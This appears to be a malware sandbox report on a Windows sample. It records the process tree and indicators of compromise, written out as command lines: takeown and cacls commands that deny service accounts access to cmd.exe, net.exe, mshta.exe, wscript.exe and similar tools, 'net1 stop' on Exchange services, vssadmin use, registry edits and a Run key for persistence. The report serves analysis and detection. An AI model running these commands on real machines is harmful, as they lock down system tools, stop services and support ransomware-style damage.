PID 4892 wrote to memory of 4288	4892	cmd.exe	cacls.exe
PID 4892 wrote to memory of 4288	4892	cmd.exe	cacls.exe
PID 5064 wrote to memory of 1324	5064	6cb1d245920799a1cc2dd8ee69e052d8.exe	cmd.exe
PID 5064 wrote to memory of 1324	5064	6cb1d245920799a1cc2dd8ee69e052d8.exe	cmd.exe
PID 5064 wrote to memory of 1324	5064	6cb1d245920799a1cc2dd8ee69e052d8.exe	cmd.exe
PID 5064 wrote to memory of 1572	5064	6cb1d245920799a1cc2dd8ee69e052d8.exe	cmd.exe
PID 5064 wrote to memory of 1572	5064	6cb1d245920799a1cc2dd8ee69e052d8.exe	cmd.exe
PID 5064 wrote to memory of 1572	5064	6cb1d245920799a1cc2dd8ee69e052d8.exe	cmd.exe
PID 5064 wrote to memory of 3276	5064	6cb1d245920799a1cc2dd8ee69e052d8.exe	vssadmin.exe
PID 5064 wrote to memory of 3276	5064	6cb1d245920799a1cc2dd8ee69e052d8.exe	vssadmin.exe
PID 5064 wrote to memory of 3412	5064	6cb1d245920799a1cc2dd8ee69e052d8.exe	cmd.exe
PID 5064 wrote to memory of 3412	5064	6cb1d245920799a1cc2dd8ee69e052d8.exe	cmd.exe
PID 5064 wrote to memory of 3412	5064	6cb1d245920799a1cc2dd8ee69e052d8.exe	cmd.exe
PID 1572 wrote to memory of 1704	1572	cmd.exe	sc.exe
PID 1572 wrote to memory of 1704	1572	cmd.exe	sc.exe
PID 1572 wrote to memory of 1704	1572	cmd.exe	sc.exe
PID 4892 wrote to memory of 4596	4892	cmd.exe	cmd.exe
PID 4892 wrote to memory of 4596	4892	cmd.exe	cmd.exe
PID 4892 wrote to memory of 4596	4892	cmd.exe	cmd.exe
PID 4892 wrote to memory of 4612	4892	cmd.exe	cacls.exe
PID 4892 wrote to memory of 4612	4892	cmd.exe	cacls.exe
PID 4892 wrote to memory of 4612	4892	cmd.exe	cacls.exe
PID 4892 wrote to memory of 1496	4892	cmd.exe	cmd.exe

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

T1112

Processes:

6cb1d245920799a1cc2dd8ee69e052d8.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0"	6cb1d245920799a1cc2dd8ee69e052d8.exe

C:\Users\Admin\AppData\Local\Temp\6cb1d245920799a1cc2dd8ee69e052d8.exe
"C:\Users\Admin\AppData\Local\Temp\6cb1d245920799a1cc2dd8ee69e052d8.exe"
1⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4696

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Vahuygrzckill$-arab.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:4892

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v "AutoRun" /f
3⤵
PID:1320

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\cmd.exe /a
3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4792

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3728

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /g Administrators:f
3⤵
PID:3708

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3736

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /g Users:r
3⤵
PID:3816

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:744

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /g Administrators:r
3⤵
PID:4288

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4596

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /d SERVICE
3⤵
PID:4612

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1496

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /d mssqlserver
3⤵
PID:2704

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:696

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /d "network service"
3⤵
PID:412

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1468

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /g system:r
3⤵
PID:1504

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:3184

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /d mssql$sqlexpress
3⤵
PID:2324

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\cmd.exe /a
3⤵
- Modifies file permissions
PID:1508

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3780

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /g Administrators:f
3⤵
PID:3000

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1372

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /g Users:r
3⤵
PID:4360

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4356

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /g Administrators:r
3⤵
PID:5004

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1180

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /d SERVICE
3⤵
PID:4420

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:600

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /d mssqlserver
3⤵
PID:4196

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:2568

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /d "network service"
3⤵
PID:1232

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2752

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /g system:r
3⤵
PID:1300

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1532

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /d mssql$sqlexpress
3⤵
PID:4100

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\net.exe /a
3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2008

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3020

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /g Administrators:f
3⤵
PID:688

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1860

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /e /g Users:r
3⤵
PID:796

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:540

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /e /g Administrators:r
3⤵
PID:4592

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2360

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /e /d SERVICE
3⤵
PID:4832

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2756

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /e /d mssqlserver
3⤵
PID:4852

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:4060

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /e /d "network service"
3⤵
PID:3296

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3204

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /e /d system
3⤵
PID:4564

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:4492

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /e /d mssql$sqlexpress
3⤵
PID:3936

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\net.exe /a
3⤵
- Modifies file permissions
PID:932

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1296

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /g Administrators:f
3⤵
PID:4168

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:856

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /e /g Users:r
3⤵
PID:1212

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1892

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /e /g Administrators:r
3⤵
PID:2860

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /e /d SERVICE
3⤵
PID:2476

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4296

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4912

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /e /d mssqlserver
3⤵
PID:2248

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1028

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /e /d "network service"
3⤵
PID:4132

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3868

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /e /d system
3⤵
PID:2332

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /e /d mssql$sqlexpress
3⤵
PID:2256

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:4788

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\net1.exe /a
3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4104

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /g Administrators:f
3⤵
PID:3672

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4968

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3832

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /e /g Users:r
3⤵
PID:3708

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /e /g Administrators:r
3⤵
PID:3716

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4984

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3816

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /e /d SERVICE
3⤵
PID:4204

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3820

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /e /d mssqlserver
3⤵
PID:4796

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1104

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /e /d "network service"
3⤵
PID:4308

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4696

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /e /d system
3⤵
PID:2480

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:4092

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /e /d mssql$sqlexpress
3⤵
PID:2932

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\net1.exe /a
3⤵
- Modifies file permissions
PID:2292

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2828

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /g Administrators:f
3⤵
PID:1684

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3996

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /e /g Users:r
3⤵
PID:1888

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2300

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /e /g Administrators:r
3⤵
PID:1816

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /e /d SERVICE
3⤵
PID:4952

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2404

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1704

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /e /d mssqlserver
3⤵
PID:3596

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:2384

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /e /d "network service"
3⤵
PID:4324

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4596

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /e /d system
3⤵
PID:3916

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /e /d mssql$sqlexpress
3⤵
PID:4500

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1340

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\mshta.exe /a
3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2704

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1792

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /g Administrators:f
3⤵
PID:640

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:412

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /e /g Users:r
3⤵
PID:248

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:272

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /e /g Administrators:r
3⤵
PID:3228

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3760

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /e /d SERVICE
3⤵
PID:4476

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3324

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /e /d mssqlserver
3⤵
PID:2388

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1504

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /e /d "network service"
3⤵
PID:936

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /e /d system
3⤵
PID:4180

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4756

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1508

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /e /d mssql$sqlexpress
3⤵
PID:2088

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\mshta.exe /a
3⤵
- Modifies file permissions
PID:3780

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /g Administrators:f
3⤵
PID:3368

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3000

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2676

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /e /g Users:r
3⤵
PID:4360

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4356

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /e /g Administrators:r
3⤵
PID:1592

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1192

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /e /d SERVICE
3⤵
PID:4056

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2456

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /e /d mssqlserver
3⤵
PID:600

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:3312

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /e /d "network service"
3⤵
PID:4472

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4188

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /e /d system
3⤵
PID:1380

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:4560

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /e /d mssql$sqlexpress
3⤵
PID:2820

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\FTP.exe /a
3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1532

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4100

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /g Administrators:f
3⤵
PID:1856

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3540

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /e /g Users:r
3⤵
PID:1284

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3544

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /e /g Administrators:r
3⤵
PID:3404

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4688

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /e /d SERVICE
3⤵
PID:444

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3128

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /e /d mssqlserver
3⤵
PID:4676

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /e /d "network service"
3⤵
PID:4836

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:4344

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3256

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /e /d system
3⤵
PID:3288

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:4852

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /e /d mssql$sqlexpress
3⤵
PID:1884

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\FTP.exe /a
3⤵
- Modifies file permissions
PID:3260

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3212

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /g Administrators:f
3⤵
PID:4388

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4448

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /e /g Users:r
3⤵
PID:4372

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:516

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /e /g Administrators:r
3⤵
PID:3936

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4444

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /e /d SERVICE
3⤵
PID:4808

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /e /d mssqlserver
3⤵
PID:4168

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4508

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1500

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /e /d "network service"
3⤵
PID:1212

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /e /d system
3⤵
PID:2860

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3440

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:3940

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /e /d mssql$sqlexpress
3⤵
PID:2476

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\wscript.exe /a
3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:988

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1028

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /g Administrators:f
3⤵
PID:2648

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3868

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /e /g Users:r
3⤵
PID:2332

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1320

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /e /g Administrators:r
3⤵
PID:4792

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3824

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /e /d SERVICE
3⤵
PID:3724

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4804

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /e /d mssqlserver
3⤵
PID:3708

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeADTopology
4⤵
PID:3736

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /e /d "network service"
3⤵
PID:2136

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:2012

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeFBA
4⤵
PID:612

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:976

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeIS
4⤵
PID:4796

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /e /d system
3⤵
PID:4204

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /e /d mssql$sqlexpress
3⤵
PID:848

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:912

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\wscript.exe /a
3⤵
- Modifies file permissions
PID:5068

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4308

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /g Administrators:f
3⤵
PID:4980

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4880

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /e /g Users:r
3⤵
PID:1588

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /e /g Administrators:r
3⤵
PID:3624

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4936

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4332

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /e /d SERVICE
3⤵
PID:1564

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4284

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /e /d mssqlserver
3⤵
PID:3360

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /e /d "network service"
3⤵
PID:3412

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:2428

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1716

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /e /d system
3⤵
PID:2404

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1772

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /e /d mssql$sqlexpress
3⤵
PID:1916

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\cscript.exe /a
3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3292

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4724

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /g Administrators:f
3⤵
PID:1312

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2988

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /e /g Users:r
3⤵
PID:5028

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /e /g Administrators:r
3⤵
PID:4628

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1496

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /e /d SERVICE
3⤵
PID:1128

C:\Windows\SysWOW64\cmd.exe
